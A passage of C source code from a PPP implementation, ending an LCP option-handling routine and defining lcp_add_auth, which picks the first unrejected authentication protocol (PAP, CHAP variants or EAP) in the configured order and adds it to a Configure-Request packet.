0); psm_peer_opt_set_accepted(&f->ppp->lcp, acfc, 0); } if (rejbuf != NULL) free(rejbuf); if (nakbuf0 != NULL) free(nakbuf0); return rcode; #undef remlen #undef LCP_OPT_PEER_ACCEPTED }
/** * selecting authentication protocols which is not rejected yet in order * of auth_order, and adding Authentication-Protocol options in ConfReq * packet area. */ static int lcp_add_auth(fsm *f, u_char **ucpp) { int i; u_char *ucp; lcp *_this; ucp = *ucpp; _this = &f->ppp->lcp; for (i = 0; _this->auth_order[i] > 0 && i < countof(_this->auth_order); i++) { switch (_this->auth_order[i]) { case PPP_AUTH_PAP: if (psm_opt_is_rejected(_this, pap)) break; PUTCHAR(PPP_LCP_AUTH_PROTOCOL, ucp); PUTCHAR(4, ucp); PUTSHORT(PPP_AUTH_PAP, ucp); psm_opt_set_requested(_this, pap, 1); _this->lastauth = PPP_AUTH_PAP; goto end_loop; case PPP_AUTH_CHAP_MD5: if (psm_opt_is_rejected(_this, chap)) break; PUTCHAR(PPP_LCP_AUTH_PROTOCOL, ucp); PUTCHAR(5, ucp); PUTSHORT(PPP_AUTH_CHAP, ucp); PUTCHAR(PPP_AUTH_CHAP_MD5, ucp); psm_opt_set_requested(_this, chap, 1); _this->lastauth = PPP_AUTH_CHAP_MD5; goto end_loop; case PPP_AUTH_CHAP_MS: if (psm_opt_is_rejected(_this, chapms)) break; PUTCHAR(PPP_LCP_AUTH_PROTOCOL, ucp); PUTCHAR(5, ucp); PUTSHORT(PPP_AUTH_CHAP, ucp); PUTCHAR(PPP_AUTH_CHAP_MS, ucp); psm_opt_set_requested(_this, chapms, 1); _this->lastauth = PPP_AUTH_CHAP_MS; goto end_loop; case PPP_AUTH_CHAP_MS_V2: if (psm_opt_is_rejected(_this, chapms_v2)) break; PUTCHAR(PPP_LCP_AUTH_PROTOCOL, ucp); PUTCHAR(5, ucp); PUTSHORT(PPP_AUTH_CHAP, ucp); PUTCHAR(PPP_AUTH_CHAP_MS_V2, ucp); psm_opt_set_requested(_this, chapms_v2,1); _this->lastauth = PPP_AUTH_CHAP_MS_V2; goto end_loop; case PPP_AUTH_EAP: if (psm_opt_is_rejected(_this, eap)) break; PUTCHAR(PPP_LCP_AUTH_PROTOCOL, ucp); PUTCHAR(4, ucp); PUTSHORT(PPP_AUTH_EAP, ucp); psm_opt_set_requested(_this, eap, 1); _this->lastauth = PPP_AUTH_EAP; goto end_loop; } } _this->lastauth = -1; return -1; end_loop: *ucpp = ucp; return 0; }